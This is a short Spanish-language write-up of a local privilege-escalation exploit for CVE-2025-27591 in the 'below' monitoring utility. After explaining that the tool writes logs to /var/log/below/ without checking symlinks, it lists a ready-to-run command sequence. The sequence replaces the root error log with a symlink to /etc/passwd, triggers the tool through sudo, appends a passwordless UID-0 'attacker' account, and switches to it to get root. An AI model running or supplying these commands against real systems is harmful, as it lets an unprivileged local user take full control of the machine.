
Exploit de escalada de privilegios local para CVE-2025-27591, que abusa del manejo inseguro de enlaces simbólicos en el registro de la utilidad mencionada a continuación para sobrescribir archivos arbitrarios como root.
CVE-2025-27591 es una vulnerabilidad de escalada de privilegios local en la utilidad below (versiones anteriores a la versión parcheada) causada por un manejo inseguro de enlaces simbólicos dentro de su mecanismo de registro. Los atacantes con acceso local pueden explotar esta falla para sobrescribir archivos arbitrarios como el usuario root, lo que conduce a una escalada de privilegios completa.
La herramienta below escribe registros en /var/log/below/ sin validar adecuadamente los enlaces simbólicos. Al crear previamente un enlace simbólico que apunte a un archivo sensible (por ejemplo, /etc/passwd), un atacante puede inyectar contenido arbitrario con privilegios elevados cuando el proceso vulnerable se ejecuta bajo sudo.
# Comprobar si existe el directorio de registros
test -d /var/log/below && ls -ld /var/log/below
# Eliminar el archivo de registro existente y crear un enlace simbólico malicioso
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Preparar una entrada maliciosa de passwd
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Desencadenar el comportamiento vulnerable usando sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Cambiar al usuario recién creado con privilegios de root
su attacker
Una explotación exitosa otorga privilegios de root a un atacante local sin privilegios, lo que permite el compromiso total del sistema.
/var/log/below/.